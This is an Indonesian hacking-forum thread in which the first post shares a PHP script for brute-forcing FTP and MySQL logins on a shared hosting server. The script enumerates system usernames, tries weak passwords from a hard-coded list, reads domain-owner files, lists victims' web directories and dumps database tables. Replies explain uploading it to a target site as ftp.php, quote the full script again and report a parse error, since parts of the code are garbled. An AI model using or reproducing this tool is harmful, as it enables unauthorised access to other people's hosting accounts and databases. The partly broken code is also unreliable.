Threaded Mode | Linear Mode

***MaViA_HaXx0r*** · 06-21-2010, 05:03 PM

sekedar share jah....

Code:

<?php

#By vc.emiter    

#PRIV8 nist

if($_GET[act] == "ftp")

{

   echo("<b>Online FTP BruteForce</b><br />");

   if($_GET[name] && $_GET[domain])

   {

      if($handle = @opendir("/home/{$_GET[name]}/domains/{$_GET[domain]}/public_html/"))

      {

         while(FALSE !== ($dir = @readdir($handle)))

         {

            if($dir != "." && $dir != "..")

               echo("{$dir}<br />\n");

         }

         closedir($handle);

      }

   }

   else

   {

      $_POST[usernames] = htmlspecialchars($_POST[usernames]);

      $_POST[passwords] = htmlspecialchars($_POST[passwords]);

      $chkdun = (isset($_POST[all_usernames])) ? " checked=\"checked\"" : "";

      $chkdpw = (isset($_POST[password_equal_username])) ? " checked=\"checked\"" : "";

echo <<<HTML

<form method="post" action="?act=ftp">

   <table>

      <tr>

         <input type="checkbox" id="all_usernames" name="all_usernames"{$chkdun} /> All usernames in the server<br />

         <input type="checkbox" id="password_equal_username" name="password_equal_username"{$chkdpw} /> The username is the password.<br />

         <strong>OR</strong><br />

      </tr>

      <tr>

         <td valign="top">

            <u>Usernames:</u><br />

            Specific usernames:<br />

            <textarea rows="5" cols="50" id="usernames" name="usernames" />{$_POST[usernames]}</textarea><br />

         </td>

         <td valign="top">

            <u>Passwords:</u><br />

            Specific passwords:<br />

            <textarea rows="5" cols="50" id="passwords" name="passwords" />{$_POST[passwords]}</textarea><br /><br />

         </td>

      </tr>

      <tr>

         <td>

            <input type="submit" id="submit" name="submit" value="Start" />

         </td>

      </tr>

   </table>

</form>

HTML;

      if(isset($_POST[submit]))

      {

         echo("<br /><br /><u>Results:</u><br />");

         $usernames = explode("\r\n", $_POST[usernames]);

         $passwords = explode("\r\n", $_POST[passwords]);

         if(isset($_POST[all_usernames]))

         {

            if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid"))

            {

               $usernames = array();

               $number = ($_POST[end] > 0) ? $_POST[end] : "5000";

               for($x=0; $x<$number; $x++)

               {

                  $user = posix_getpwuid($x);

                  if(strlen($user[name]) > 0)

                     $usernames[] = $user[name];

               }

            }

            else

               echo("Unable to get usernames list.<br />");

         }

         foreach($usernames as $user)

         {

            if(isset($_POST[password_equal_username]))

            $passwords[user] = $user;

            foreach($passwords as $pass)

            {

               $sock = @fsockopen("127.0.0.1", "21", $errno, $errstr, 3);

               $get = @fgets($sock, 150);

               @fputs($sock, "USER {$user}\n");

               $get = @fgets($sock, 150);

               @fputs($sock, "PASS {$pass}\n");

               $get = @fgets($sock, 150);

               if(strstr($get, "logged"))

               {

                  $file = "/etc/virtual/domainowners";

                  $open = @fopen($file, "r");

                  $data = @fread($open, filesize($file));

                  if(preg_match_all("/(.*): {$user}/", $data, $matches))

                  {

                     foreach($matches[1] as $domain)

                        echo("

    * <a href=\"?act=ftp&name={$user}&domain={$domain}\">{$user}:{$pass}</a><br />\n");

                  }

                  @fclose($open);

                  @fclose($sock);

               }

            }

         }

      }

   }

}

elseif($_GET[act] == "mysql")

{

   echo("<b>Online MySQL BruteForce</b><br />");

   if($_GET[love] && $_GET[passwd])

   {

      @mysql_connect("localhost", $_GET[love], $_GET[passwd]);

      if($_GET[db])

      {

         @mysql_select_db($_GET[db]);

         if($_GET

)

         {

            $query = @mysql_query("SELECT * FROM {$_GET

} LIMIT 60");

               while($r = @mysql_fetch_assoc($query))

               {

                  if(!$columns)

                  {

                     echo("<table border=\"1\"><tr>");

                     foreach($r as $tmp => $value)

                        echo("<td><b>{$tmp}</b></td>");

                     echo("</tr></tables>");

                     $columns = 1;

                  }

                  echo("<tr>");

                  foreach($r as $tmp => $value)

                     echo("<td>{$value}</td>");

                  echo("</tr>\r\n");

               }

               echo("</tables>");

         }

         else

         {

            $query = @mysql_query("SHOW TABLES");

            while($r = @mysql_fetch_array($query))

               echo("<a href=\"?act=mysql&love={$_GET[love]}&passwd={$_GET[passwd]}&db={$_GET[db]}&table={$r[0]}\">{$r[0]}</a><br />\n");

         }

      }

      else

      {

         $query = @mysql_query("SHOW DATABASES");

         while($r = @mysql_fetch_array($query))

            echo("<a href=\"?act=mysql&love={$_GET[love]}&passwd={$_GET[passwd]}&db={$r[0]}\">{$r[0]}</a><br />\n");

      }

   }

   else

   {

      if($handle = @opendir("/var/lib/mysql/"))

      {

         while(FALSE !== ($name = @readdir($handle)))

         {

            if($name != "." && $name != "..")

            {

               $passwords = array(

               "123456", "123123", "12345", "qazwsx", "123321",

               "qwerty", "1q2w3e", "12qwer", "qweqwe", "111222",

               "111111", "112233", "121212", "q1w2e3", "micro",

               "test", "asdfgh", "zxcvbn", "");

               $usernames_count = count($name);

               $passwords_count = count($passwords);

               $results = 0;

               if($_GET[passwd])

               {

                  if(@mysql_connect("localhost", $f, $_GET[passwd]))

                     echo("

    * <a href=\"?act=mysql&love={$f}&passwd={$GET[passwd]}\">{$f}</a><br />\n");

               }

               else

               {

                  foreach($passwords as $pass)

                  {

                     if(@mysql_connect("localhost", $name, $pass))

                     {

                        $results++;

                        echo("

    * <a href=\"?act=mysql&love={$name}&passwd={$pass}\">{$name} => [{$pass}]</a><br />\n");

                     }

                  }

               }

            }

         }

         closedir($handle);

      }

      else

         echo("Unable to get usernames list.<br />");

   }

}

else

   echo("<a href=\"?act=ftp\">FTP Brute</a>&nbsp;|&nbsp;<a href=\"?act=mysql\">MySQL</a>");

//vc.emit3r

?>

revanthem · 01-14-2011, 03:56 PM

misi om numpang tanya.. cara pemakaian nya gimana ya?
apakah di compile dulu.. ataukah di upload ke hosting.. atau ....
mohon pencerahan nya ya...

***note*** · 01-14-2011, 04:36 PM

(01-14-2011 03:56 PM)revanthem Wrote: misi om numpang tanya.. cara pemakaian nya gimana ya?
apakah di compile dulu.. ataukah di upload ke hosting.. atau ....
mohon pencerahan nya ya...

sepertinya itu di upload ke web yg mau di scan ftpnya om ....
di copy aja om di notepad trus save extensi .php

trus diupload deh ketawa

misal

Code:

www.target.com/ftp.php

;prustasi;prustasi;prustasi;prustasi

ce.dealova · 01-14-2011, 04:45 PM

(06-21-2010 05:03 PM)MaViA_HaXx0r Wrote: sekedar share jah....

Code:

<?php #By vc.emiter #PRIV8 nist if($_GET[act] == "ftp") { echo("<b>Online FTP BruteForce</b><br />"); if($_GET[name] && $_GET[domain]) { if($handle = @opendir("/home/{$_GET[name]}/domains/{$_GET[domain]}/public_html/")) { while(FALSE !== ($dir = @readdir($handle))) { if($dir != "." && $dir != "..") echo("{$dir}<br />\n"); } closedir($handle); } } else { $_POST[usernames] = htmlspecialchars($_POST[usernames]); $_POST[passwords] = htmlspecialchars($_POST[passwords]); $chkdun = (isset($_POST[all_usernames])) ? " checked=\"checked\"" : ""; $chkdpw = (isset($_POST[password_equal_username])) ? " checked=\"checked\"" : ""; echo <<<HTML <form method="post" action="?act=ftp"> <table> <tr> <input type="checkbox" id="all_usernames" name="all_usernames"{$chkdun} /> All usernames in the server<br /> <input type="checkbox" id="password_equal_username" name="password_equal_username"{$chkdpw} /> The username is the password.<br /> <strong>OR</strong><br /> </tr> <tr> <td valign="top"> <u>Usernames:</u><br /> Specific usernames:<br /> <textarea rows="5" cols="50" id="usernames" name="usernames" />{$_POST[usernames]}</textarea><br /> </td> <td valign="top"> <u>Passwords:</u><br /> Specific passwords:<br /> <textarea rows="5" cols="50" id="passwords" name="passwords" />{$_POST[passwords]}</textarea><br /><br /> </td> </tr> <tr> <td> <input type="submit" id="submit" name="submit" value="Start" /> </td> </tr> </table> </form> HTML; if(isset($_POST[submit])) { echo("<br /><br /><u>Results:</u><br />"); $usernames = explode("\r\n", $_POST[usernames]); $passwords = explode("\r\n", $_POST[passwords]); if(isset($_POST[all_usernames])) { if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")) { $usernames = array(); $number = ($_POST[end] > 0) ? $_POST[end] : "5000"; for($x=0; $x<$number; $x++) { $user = posix_getpwuid($x); if(strlen($user[name]) > 0) $usernames[] = $user[name]; } } else echo("Unable to get usernames list.<br />"); } foreach($usernames as $user) { if(isset($_POST[password_equal_username])) $passwords[user] = $user; foreach($passwords as $pass) { $sock = @fsockopen("127.0.0.1", "21", $errno, $errstr, 3); $get = @fgets($sock, 150); @fputs($sock, "USER {$user}\n"); $get = @fgets($sock, 150); @fputs($sock, "PASS {$pass}\n"); $get = @fgets($sock, 150); if(strstr($get, "logged")) { $file = "/etc/virtual/domainowners"; $open = @fopen($file, "r"); $data = @fread($open, filesize($file)); if(preg_match_all("/(.*): {$user}/", $data, $matches)) { foreach($matches[1] as $domain) echo(" * <a href=\"?act=ftp&name={$user}&domain={$domain}\">{$user}:{$pass}</a><br />\n"); } @fclose($open); @fclose($sock); } } } } } } elseif($_GET[act] == "mysql") { echo("<b>Online MySQL BruteForce</b><br />"); if($_GET[Kata kotor] && $_GET[passwd]) { @mysql_connect("localhost", $_GET[Kata kotor], $_GET[passwd]); if($_GET[db]) { @mysql_select_db($_GET[db]); if($_GET ) { $query = @mysql_query("SELECT * FROM {$_GET } LIMIT 60"); while($r = @mysql_fetch_assoc($query)) { if(!$columns) { echo("<table border=\"1\"><tr>"); foreach($r as $tmp => $value) echo("<td><b>{$tmp}</b></td>"); echo("</tr></tables>"); $columns = 1; } echo("<tr>"); foreach($r as $tmp => $value) echo("<td>{$value}</td>"); echo("</tr>\r\n"); } echo("</tables>"); } else { $query = @mysql_query("SHOW TABLES"); while($r = @mysql_fetch_array($query)) echo("<a href=\"?act=mysql&Kata kotor={$_GET[Kata kotor]}&passwd={$_GET[passwd]}&db={$_GET[db]}&table={$r[0]}\">{$r[0]}</a><br />\n"); } } else { $query = @mysql_query("SHOW DATABASES"); while($r = @mysql_fetch_array($query)) echo("<a href=\"?act=mysql&Kata kotor={$_GET[Kata kotor]}&passwd={$_GET[passwd]}&db={$r[0]}\">{$r[0]}</a><br />\n"); } } else { if($handle = @opendir("/var/lib/mysql/")) { while(FALSE !== ($name = @readdir($handle))) { if($name != "." && $name != "..") { $passwords = array( "123456", "123123", "12345", "qazwsx", "123321", "qwerty", "1q2w3e", "12qwer", "qweqwe", "111222", "111111", "112233", "121212", "q1w2e3", "micro", "test", "asdfgh", "zxcvbn", ""); $usernames_count = count($name); $passwords_count = count($passwords); $results = 0; if($_GET[passwd]) { if(@mysql_connect("localhost", $f, $_GET[passwd])) echo(" * <a href=\"?act=mysql&Kata kotor={$f}&passwd={$GET[passwd]}\">{$f}</a><br />\n"); } else { foreach($passwords as $pass) { if(@mysql_connect("localhost", $name, $pass)) { $results++; echo(" * <a href=\"?act=mysql&Kata kotor={$name}&passwd={$pass}\">{$name} => [{$pass}]</a><br />\n"); } } } } } closedir($handle); } else echo("Unable to get usernames list.<br />"); } } else echo("<a href=\"?act=ftp\">FTP Brute</a> | <a href=\"?act=mysql\">MySQL</a>"); //vc.emit3r ?>

kaka sexy ^^ makasih banyak kak,sudah kasih tau saya

./blacknotes · 01-14-2011, 04:52 PM

Parse error: syntax error, unexpected T_STRING, expecting ']' in sensor

\www\ftp.php on line 131

cnxiya · (This post was last modified: 02-07-2011 01:48 PM by cnxiya.)

seem very nice ~

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	SQL TOOL (MYSQL, MSSQL) NEW FEATURES	Wayc0de	25	318	06-21-2011 03:41 PM Last Post: Wayc0de
	[perl] MD5 Hash Bruteforce Kit	xtr0nic	8	212	04-18-2010 09:15 PM Last Post: note
	SQL TOOL MYSQL & MSSQL!	Danzel	11	198	04-18-2010 04:20 PM Last Post: note